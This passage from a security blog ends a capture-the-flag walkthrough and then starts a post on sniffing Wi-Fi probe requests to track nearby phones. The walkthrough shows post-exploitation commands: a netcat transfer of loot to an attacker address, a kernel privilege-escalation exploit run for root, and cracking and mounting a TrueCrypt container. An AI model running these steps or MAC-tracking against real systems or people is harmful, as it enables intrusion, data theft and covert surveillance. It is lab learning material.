In any case, I checked for a readable/writable/executable directory and found 2 directories that fit the bill;<br />
<b>/tmp</b> & <b>/var/tmp/ </b> </div>
<div>
<br />
So I uploaded the script to /tmp/ using the meterpreter upload function,<br />
then dropped to a shell and executed it, saving output to a file instead of stdout.</div>
<span style="color: lime;">upload /root/tools/linenum.sh enum.sh</span><br />
<br />
Drop to shell;<br />
<span style="color: lime;">shell</span><br />
<br />
Run the enumeration script;<br />
<span style="color: lime;">bash enum.sh > enum.txt</span><br />
<br />
Some errors are reported for missing files, but I give the script a few secs to run and see that enum.txt is created.<br />
Then I get out of the shell and download the created enum.txt with the meterpreter shell to the attacking VM for easy viewing.<br />
<span style="color: lime;">download enum.txt /root/enum/</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/enum-01_zpsyqdkibhp.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/enum-01_zpsyqdkibhp.png" height="458" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
In this particular case, netcat is installed on the victim, so we could of course also do the transfer in the shell using netcat if we wanted to;<br />
<br />
Starting the listening session on the attacker;<br />
<span style="color: lime;">nc -l -v -p 1234 > enum.txt</span><br />
Sending from the victim;<br />
<span style="color: lime;">nc -w 3 192.168.56.101 1234 < enum.txt</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/netcat-01_zpsfg3lo72g.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/netcat-01_zpsfg3lo72g.png" height="516" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Anyway, browsing through the information from the enumeration script, we get kernel & OS details.<br />
<br />
<span style="color: lime;">head -n 35 enum.txt</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/enum-02_zpsd08lx03n.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/enum-02_zpsd08lx03n.png" height="374" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Kernel information:<br />
<i>Linux version 3.13.0-43-generic (buildd@tipua) (gcc version 4.8.2 (Ubuntu 4.8.2-19ubuntu1) ) #72-Ubuntu SMP Mon Dec 8 19:35:06 UTC 2014</i><br />
<br />
Specific release information:<br />
<i>DISTRIB_ID=Ubuntu</i><br />
<i>DISTRIB_RELEASE=14.04</i><br />
<i>DISTRIB_CODENAME=trusty</i><br />
<i>DISTRIB_DESCRIPTION="Ubuntu 14.04.1 LTS"</i><br />
<br />
<br />
So.. searchsploit to the rescue for exploit info!<br />
<br />
<span style="color: lime;">searchsploit ubuntu 14.04</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/searchsploit_zpsuizqvavr.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/searchsploit_zpsuizqvavr.png" height="392" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
I see a few options to check out!<br />
<br />
So I uploaded, compiled, and did what I thought was required... but dammit.. consistently got errors and failed miserably..<br />
For whatever reason (and I am the first to blame my lack of expertise in the matter..) the local exploits were just not working and gave mount errors..<br />
<br />
Reaching the end of my tether, the good 'ol gents at THS (thanks Grey-Matter & H4v0K) pointed me to a website with kernel exploits for possible sanity-saving solutions;<br />
<a href="https://www.kernel-exploits.com/">https://www.kernel-exploits.com/</a><br />
<br />
There I see the same (or similar) overlayfs exploit which I could not get to work using the version from exploitdb, so I grabbed 'ofs_64'.<br />
<br />
So let's upload ofs_64 to the victim using the meterpreter shell, then drop to a shell;<br />
<span style="color: lime;">upload /root/tools/ofs_64 ofs_64</span><br />
<span style="color: lime;">shell</span><br />
<br />
Then make the file executable and let it rip on the victim;<br />
<span style="color: lime;">chmod +x ofs_64</span><br />
<span style="color: lime;">./ofs_64</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/exploit_zpsintbdojw.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/exploit_zpsintbdojw.png" height="612" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
A quick user check;<br />
<span style="color: lime;">whoami</span><br />
<br />
And oh what a joyous moment, root is achieved!<br />
<br />
So, now we have root; time to furiously dig around in the directories which were previously hidden from us..<br />
In doing so we find a file in the /root/ directory: dave.tc<br />
Could this be a protected truecrypt container?<br />
(<a href="http://www.brimorlabsblog.com/2014/01/identifying-truecrypt-volumes-for-fun.html">http://www.brimorlabsblog.com/2014/01/identifying-truecrypt-volumes-for-fun.html</a>)<br />
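The properties the linked post uses to recognise a TrueCrypt volume (no file signature, a size that is a multiple of 512 bytes, and content that is random from the first byte because the header is encrypted too) can be checked in a few lines. As an added example (mine, not from the post or the linked article) here is that check, plus a directory walk so a responder can hunt for containers on a host instead of stumbling on one in /root. The entropy threshold is derived from the sample size, because the plain entropy estimate of a small random sample legitimately scores below 8 bits. The test files are constructed in memory; the "random" one is built from chained SHA-256 digests so the run is deterministic.<br />

```python
"""Heuristics for spotting a TrueCrypt-style container (added example)."""
import hashlib
import math
import os
from collections import Counter
from typing import Dict, List, Optional

# Files starting with one of these are something else, however random their body looks.
KNOWN_MAGIC = {
    b"\x89PNG": "PNG", b"\xff\xd8\xff": "JPEG", b"GIF8": "GIF", b"%PDF": "PDF",
    b"PK\x03\x04": "ZIP", b"\x1f\x8b": "gzip", b"\x7fELF": "ELF",
    b"SQLite format 3": "SQLite", b"LUKS\xba\xbe": "LUKS",
}
SAMPLE_BYTES = 64 * 1024   # how much of the file the entropy estimate looks at


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for empty input, 8.0 for a perfectly uniform byte stream."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def expected_random_entropy(n: int) -> float:
    """Entropy that n truly random bytes are expected to score with this estimator,
    which is biased low by about (k-1)/(2 n ln 2) for k = 256 symbols."""
    return 8.0 - 255 / (2 * n * math.log(2))


def assess(head: bytes, size: int) -> Dict[str, object]:
    """Apply the three checks to a file's leading bytes and its total size."""
    magic = next((name for sig, name in KNOWN_MAGIC.items() if head.startswith(sig)), None)
    entropy = shannon_entropy(head)
    threshold = expected_random_entropy(max(len(head), 1)) - 0.05   # small tolerance
    verdict = magic is None and size >= 512 and size % 512 == 0 and entropy >= threshold
    return {
        "size": size, "size_mod_512": size % 512, "magic": magic,
        "entropy": round(entropy, 3), "entropy_threshold": round(threshold, 3),
        "looks_like_container": verdict,
    }


def assess_blob(data: bytes) -> Dict[str, object]:
    return assess(data[:SAMPLE_BYTES], len(data))


def assess_file(path: str) -> Dict[str, object]:
    with open(path, "rb") as f:
        head = f.read(SAMPLE_BYTES)
    return assess(head, os.path.getsize(path))


def scan_tree(root: str, min_size: int = 512) -> List[str]:
    """Paths under `root` that pass the container checks (unreadable files are skipped)."""
    hits: List[str] = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                if os.path.getsize(path) >= min_size and assess_file(path)["looks_like_container"]:
                    hits.append(path)
            except OSError:
                continue
    return sorted(hits)


def pseudo_random_bytes(n: int) -> bytes:
    """Deterministic stand-in for encrypted content (chained SHA-256 blocks)."""
    out, block = bytearray(), b"seed"
    while len(out) < n:
        block = hashlib.sha256(block).digest()
        out += block
    return bytes(out[:n])


# Constructed test content: container-like, plaintext, and a file with a PNG signature.
CONTAINER_LIKE = pseudo_random_bytes(SAMPLE_BYTES)                 # 65536 bytes, 512-aligned
PLAINTEXT = (b"pictures of cash and piggies\n" * 4096)[:SAMPLE_BYTES]
PNG_LIKE = b"\x89PNG\r\n\x1a\n" + CONTAINER_LIKE[8:]

if __name__ == "__main__":
    for label, blob in (("container-like", CONTAINER_LIKE), ("plaintext", PLAINTEXT), ("png", PNG_LIKE)):
        print(label, assess_blob(blob))
```

Compressed or already-encrypted files with a signature (a .gz, a LUKS volume) are excluded by the magic check, which is the point of keeping that list: a TrueCrypt volume is unusual precisely in having nothing at the start to identify it.<br />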
<br />
I started up a netcat listener on my attacker and transferred the file.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/root-01_zpsymhuu4si.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/root-01_zpsymhuu4si.png" height="620" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Now to see if this was the object that the hint on cracking was about!<br />
So, previously, we had seen that the email was hinting at the rockyou wordlist, and furthermore<br />
hinting that the passphrase size would not be more than 11 characters...<br />
<br />
SO, to assist in the plight of us cash-strapped, GPU-lacking VM soulmates, let's whittle that list down.<br />
Considering that the email was hinting that the passphrase was no more than 11 characters, let's cut out all words that are not 11 characters long;<br />
<br />
<span style="color: lime;">pw-inspector -i rockyou.txt -m 11 -M 11 -o rock-11.txt</span><br />
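pw-inspector does the trimming in one line; as an added example (mine, not the post's) here is the same filter in Python, which makes two details visible that bite people who try this by hand: rockyou.txt contains lines that are not valid UTF-8, so the list has to be processed as bytes (a text-mode read aborts partway through), and lengths are counted in bytes, which is also how the cracker sees them. The bounds are parameters, so `-m 11 -M 11` is one call and the email's literal "not longer than 11" is another. The sample words are constructed.<br />

```python
"""Trim a wordlist to a length range, byte-safely (added example)."""
from typing import Dict, Iterable, List, Optional, Set, Tuple


def shape_wordlist(lines: Iterable[bytes], min_len: int, max_len: int,
                   charset: Optional[bytes] = None) -> Tuple[List[bytes], Dict[str, int]]:
    """Keep words whose byte length is in [min_len, max_len] and, if `charset` is
    given, whose bytes all belong to it; duplicates are dropped. Returns (words, stats)."""
    stats = {"read": 0, "wrong_length": 0, "outside_charset": 0, "duplicate": 0, "kept": 0}
    kept: List[bytes] = []
    seen: Set[bytes] = set()
    allowed = set(charset) if charset is not None else None
    for raw in lines:
        stats["read"] += 1
        word = raw.rstrip(b"\r\n")            # tolerate CRLF lists without touching the word
        if not min_len <= len(word) <= max_len:
            stats["wrong_length"] += 1
            continue
        if allowed is not None and any(b not in allowed for b in word):
            stats["outside_charset"] += 1
            continue
        if word in seen:
            stats["duplicate"] += 1
            continue
        seen.add(word)
        kept.append(word)
    stats["kept"] = len(kept)
    return kept, stats


def shape_file(src: str, dst: str, min_len: int, max_len: int,
               charset: Optional[bytes] = None) -> Dict[str, int]:
    """File-to-file version; both ends are opened in binary mode on purpose."""
    with open(src, "rb") as f_in:
        words, stats = shape_wordlist(f_in, min_len, max_len, charset)
    with open(dst, "wb") as f_out:
        f_out.write(b"\n".join(words) + (b"\n" if words else b""))
    return stats


# Constructed sample; the third entry carries a Latin-1 byte that is not valid UTF-8.
SAMPLE_WORDS = [
    b"123456\n",
    b"password\r\n",
    b"caf\xe9latte12\n",        # 11 bytes, but only 10 characters if decoded as Latin-1
    b"academy2016\n",
    b"academy2016\n",           # duplicate
    b"thejam-song\n",
    b"muchtoolongpassphrase\n",
    b"shortpass11\n",
]
ALNUM = b"abcdefghijklmnopqrstuvwxyz0123456789"

if __name__ == "__main__":
    words, stats = shape_wordlist(SAMPLE_WORDS, 11, 11)
    print(stats)
    for w in words:
        print(w)
```

The equivalent of the pw-inspector command above is `shape_file("rockyou.txt", "rock-11.txt", 11, 11)`; pass a `charset` as well if the hint also tells you which characters to expect.<br />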
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/pw-insp_zpsbut7vqrz.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/pw-insp_zpsbut7vqrz.png" height="280" width="640" /></a></div>
<br />
<br />
<br />
<br />
Awesome, that just cut over 13 million passphrases from the list; that'll do.<br />
Now, with a relatively small wordlist, we could run a crack on the Kali VM using truecrack;<br />
<br />
<span style="color: lime;">truecrack -t dave.tc -k sha512 -w rock-11.txt -b 2 -v</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/truecrack_zpsj3ky5upj.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/truecrack_zpsj3ky5upj.png" height="406" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
But.. as much as I really like to try to do as much as I can within the Kali VM, for this crack I had to revert to Windows, as I have a (lowpowahmobile) gtx card in the lappy and at least get some semi-decent cracking speeds with hashcat on that..<br />
(stop laughing H4v0K and ch3rn0byl, I am well aware that my petty mobile GPU compares with the GPUs filling your slots like a pygmy marmoset compares with a silverback mountain gorilla.. :D)<br />
<br />
<br />
So, firing up hashcat in Windows, I first tried hash mode 6211, which did not yield any results..<br />
Then tried hash mode <b>6221</b><br />
<span style="color: lime;">cudahashcat64.exe -m 6221 -a 0 d:\dave.tc d:\wordlists\rock-11.txt</span><br />
<div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/hashcat_02_zpshgskzvxz.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/hashcat_02_zpshgskzvxz.png" height="560" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
So now we have a password to the truecrypt container!</div>
Now what.. truecrypt is like persona non grata nowadays, right? Not gonna install that anywhere..<br />
<br />
Some googling tells me I don't need to! cryptsetup will allow us to glean all information out of an encrypted truecrypt volume without needing truecrypt at all. Awesomesauce..<br />
<br />
It did take a further bit of googling to find a guide that seemed foolproof enough for the likes of me, but eventually I did find one ;<br />
<a href="http://www.adercon.com/ac/node/114">http://www.adercon.com/ac/node/114</a><br />
Awesome stuff.<br />
<br />
So let's mount it up at location /media/DAVE;<br />
<span style="color: lime;">mkdir /media/DAVE</span><br />
<span style="color: lime;">losetup /dev/loop0 /root/dave.tc</span><br />
<span style="color: lime;">cryptsetup --type tcrypt open /dev/loop0 DAVETC</span><br />
<i>(enter recovered password when prompted)</i><br />
<span style="color: lime;">mount /dev/mapper/DAVETC /media/DAVE</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/cryptsetup_zpsaxp7xj7p.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/cryptsetup_zpsaxp7xj7p.png" height="262" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
WOOHOOO! stuff...<br />
<br />
Hmm.. listing the files in the found directories shows some nice pictures of cash and piggies.. nothing too interesting..<br />
(let's pretend I didn't spend a significant amount of time checking for steganography, hidden hex etc. before I thought of checking for hidden files/directories.. lol)<br />
<br />
So let's do a recursive file listing for all files including hidden files/directories;<br />
<br />
<span style="color: lime;">ls -laR /media/DAVE/</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/lslar_zpsitmukvqo.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/lslar_zpsitmukvqo.png" height="640" width="548" /></a></div>
<br />
What do I see there... flag.txt :D<br />
<br />
<span style="color: lime;">cat /media/DAVE/.secret/.top/flag.txt</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/flag_zpswhntmx9l.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/flag_zpswhntmx9l.png" height="328" width="640" /></a></div>
<br />
Job Done :D<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/giphy_zpsi30bgdiy.gif" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/giphy_zpsi30bgdiy.gif" height="179" width="320" /></a></div>
<br />
Cleaning up after mounting the truecrypt volume with cryptsetup;<br />
<span style="color: lime;">umount /media/DAVE</span><br />
<span style="color: lime;">cryptsetup --type tcrypt close DAVETC</span><br />
<span style="color: lime;">losetup -d /dev/loop0</span><br />
We can now remove the created directory DAVE<br />
<span style="color: lime;">rm -r /media/DAVE</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/cleanup_zpsykr8eefu.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/cleanup_zpsykr8eefu.png" height="257" width="640" /></a></div>
<br />
Big up to the THS crew for the necessary keeping me going when I was hitting a wall :D<br />
<br />
and THANK YOU knightmare for the fun and games, interesting to see the truecrypt part and have learned a few new things, and have been reminded of the importance of many others :D<br />
<div>
Look forward to your next one !<br />
<br />
<br />
<br />
Recap of useful linkage;<br />
=================<br />
* Linux enumeration<br />
<a href="https://github.com/rebootuser/LinEnum" target="_blank">https://github.com/rebootuser/LinEnum</a><br />
<a href="https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/" target="_blank">https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/</a><br />
<a href="https://highon.coffee/blog/linux-local-enumeration-script/" target="_blank">https://highon.coffee/blog/linux-local-enumeration-script/</a><br />
<br />
* Drupal<br />
<a href="http://www.madirish.net/408" target="_blank">http://www.madirish.net/408</a> &lt; drupal bruteforce v5 &amp; v6<br />
<a href="https://www.youtube.com/watch?v=--DuAicB4pc" target="_blank">https://www.youtube.com/watch?v=--DuAicB4pc</a> &lt; drupageddon explained<br />
<br />
* Exploits<br />
<a href="https://www.kernel-exploits.com/" target="_blank">https://www.kernel-exploits.com/</a><br />
<a href="https://www.exploit-db.com/" target="_blank">https://www.exploit-db.com/</a><br />
<br />
* Mounting truecrypt container with cryptsetup<br />
<a href="http://www.adercon.com/ac/node/114" target="_blank">http://www.adercon.com/ac/node/114</a><br />
<a href="https://tails.boum.org/doc/encryption_and_privacy/truecrypt/index.en.html" target="_blank">https://tails.boum.org/doc/encryption_and_privacy/truecrypt/index.en.html</a><br />
<div>
<br /></div>
</div>
</div>
<b>Scanning for / Alerting on client probes</b> (published 2015-05-27, updated 2015-06-13)<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
Scanning for / Alerting on presence of Client MACs / ESSIDs<br />
<br />
<br />
There are a number of great posts out there on this very subject, but hell, no harm in another one as it is an interesting subject.<br />
<br />
Basically I thought it would be cool to have some form of alert system based on mobiles so I could keep track of the comings and goings around the house.<br />
(and when the missus returns so have a few secs to hide the empties.. ;) )<br />
<br />
So what methods are there?<br />
<br />
Well, if we are talking mobiles, then Bluetooth &amp; WiFi are the options you could look at.<br />
<br />
<b>BLUETOOTH</b><br />
<b>============</b><br />
ronin (JP Dunning from www.hackfromacave.com) already made a cool script called blueranger.sh which is included in Kali, so anything I can think of will have to wait until I consider it to be of similar quality.. ;)<br />
<div>
The gist of it however is as follows;</div>
Use l2ping to ping a known Bluetooth device address (BD_ADDR) and then use hcitool to read the link quality, for example;<br />
<br />
<span style="color: lime;">l2ping -i hci0 -c 1 00:11:22:33:44:55 ; hcitool -i hci0 lq 00:11:22:33:44:55</span><br />
<br />
<br />
<b>WIFI</b><br />
<b>=====</b><br />
A way to start is to monitor probe request frames, as these are what WiFi devices constantly broadcast to find out whether a (known or preferred) network is in range to connect to.<br />
<br />
Probe requests can be captured with a program like Wireshark or tcpdump, or any other packet sniffer that supports monitor-mode interfaces.<br />
(You will need a monitor interface to pick up frames from devices that are not on your network.)<br />
<br />
<br />
<b>Wireshark</b><br />
<b>-------------- </b><br />
Wireshark is a very well known, well supported &amp; documented programme.<br />
Start a capture in Wireshark with your card in monitor mode and then use the display filter;<br />
<span style="color: lime;">wlan.fc.type_subtype eq 4</span><br />
<br />
This will list all probe requests, allowing you to see the client's MAC address and the probed ESSIDs.<br />
<br />
Drilling down deeper into the packet you can find more information you may find interesting, such as signal strength.<br />
<br />
A good tip for finding out which filter is required to focus on certain information is to drill down to the field you want, select the row of interest, and then;<br />
Right Click -> Apply as Filter -> Selected<br />
<br />
The required filter expression is now shown in the filter bar and applied.<br />
Very handy for finding out what the filter syntax is, as there are a lot of fields...<br />
<br />
<br />
But I was more looking for something to script with, so needed a CLI variant.<br />
<br />
<b>tcpdump</b><br />
<b>------------</b><br />
If you're looking for a CLI solution for packet sniffing, then tcpdump is one of the first tools that comes to mind.<br />
<br />
Again you will need an interface in monitor mode; let's say we have a mon0 interface, then you could use the line below to sniff for probe request frames;<br />
<br />
<b><span style="color: lime;">tcpdump -i mon0 -e -s 256 type mgt subtype probe-req 2> /dev/null</span></b><br />
(the 2> /dev/null hides tcpdump's own messages on standard error)<br />
<br />
<br />
tcpdump works great, but when piping the output to a script I was having trouble with its buffering, even when using the -l switch.<br />
<div>
<br /></div>
<b>tshark</b><br />
<b>---------</b><br />
tshark is the CLI version of Wireshark, so output can be filtered using the same filters as in the GUI version.<br />
<br />
<span style="color: lime;"><b>tshark -i wlan2mon -n -l subtype probe-req</b></span><br />
<br />
Using the -T fields switch, together with -e, we can further choose which fields to print (field names can be found using the aforementioned method in Wireshark's GUI).<br />
<br />
<span style="color: lime;"><b>tshark -i mon0 -n -l subtype probe-req -T fields -e wlan.sa -e radiotap.dbm_antsignal -e wlan_mgt.ssid</b></span><br />
<br />
wlan.sa == source address (the client's MAC)<br />
radiotap.dbm_antsignal == RSSI (signal strength in dBm)<br />
wlan_mgt.ssid == probed ESSID<br />
<br />
<br />
Now with some scripting I was able to make something come to life to satisfy my curiosity :D<br />
It can (and probably will in the future) be improved in some areas, but for now it works more or less OK.<br />
<br />
Anyways, enter shee.sh, a script to either log all seen probe requests or alert on seeing known or unknown client macs depending on the options chosen.<br />
<br />
The script was written on, and intended for use on Kali Linux.<br />
<br />
Easiest to first make the script executable;<br />
<span style="color: lime;"><b>chmod +x shee.sh</b></span><br />
<br />
When running the script without any switches or with just the <span style="color: lime;"><b>-h</b></span> switch, help info will be shown;<br />
<span style="color: lime;"><b>./shee.sh -h</b></span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/shee-05_zpsyuj4bggg.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/shee-05_zpsyuj4bggg.png" height="400" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
There are input checks on the Interface (to make sure that the interface exists and is in monitor mode)</div>
<div class="separator" style="clear: both; text-align: left;">
and also on the MAC address input (to make sure that correct syntax is used)</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
shee.sh requires a monitor interface to function, to check what wireless interfaces you have </div>
<div class="separator" style="clear: both; text-align: left;">
and what their status is, you can use the <span style="color: lime;"><b>-I</b></span> switch ;</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="color: lime;"><b>./shee.sh -I</b></span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/shee-01_zps3tkws2cl.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/shee-01_zps3tkws2cl.png" height="400" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
The interface to use should be specified using the <span style="color: lime;"><b>-i</b></span> switch.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
You can set the script up to sniff specific MAC addresses using the <span style="color: lime;"><b>-m</b></span> switch and specifying the MAC address.</div>
<div class="separator" style="clear: both; text-align: left;">
The MAC address can either be entered using colons or hyphens;</div>
<div class="separator" style="clear: both; text-align: left;">
00:11:22:33:44:55 or 00-11-22-33-44-55</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="color: lime;"><b>./shee.sh -i wlan4mon -m 00:11:22:33:44:55</b></span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/shee-02_zpsw6db9euz.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/shee-02_zpsw6db9euz.png" height="400" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Or you can set it up to listen for a specific probed ESSID with the <span style="color: lime;"><b>-e</b></span> switch followed by the target ESSID (use quotation marks if spaces!) ;</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="color: lime;"><b>./shee.sh -i wlan4mon -e "Awesome Sauce"</b></span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/shee-03_zps4jgipasb.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/shee-03_zps4jgipasb.png" height="400" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Or you can just set it up to simply log all clients probing about ; </div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="color: lime;"><b>./shee.sh -i wlan4mon </b></span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/b733a560-e265-4dde-bc93-7380f5533b7c_zpspqkrhuwt.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/b733a560-e265-4dde-bc93-7380f5533b7c_zpspqkrhuwt.png" height="400" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
At the moment this function prints all it sees and does not (yet) only print new clients, something for me to think about ;) </div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
All three of the above scans will continue until stopped with Ctrl-C.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Including the <span style="color: lime;"><b>-s</b></span> switch adds a sound alert for each client found, in any of the above three modes (when further switches are combined, the mode has to be given explicitly with the <span style="color: lime;"><b>-M</b></span> switch);</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="color: lime;"><b>./shee.sh -i wlan4mon -M 1 -m 00:11:22:33:44:55 -s</b></span></div>
<div class="separator" style="clear: both;">
<span style="color: lime;"><b>./shee.sh -i wlan4mon -M 2 -e "Awesome Sauce" -s</b></span></div>
<div>
<div class="separator" style="clear: both;">
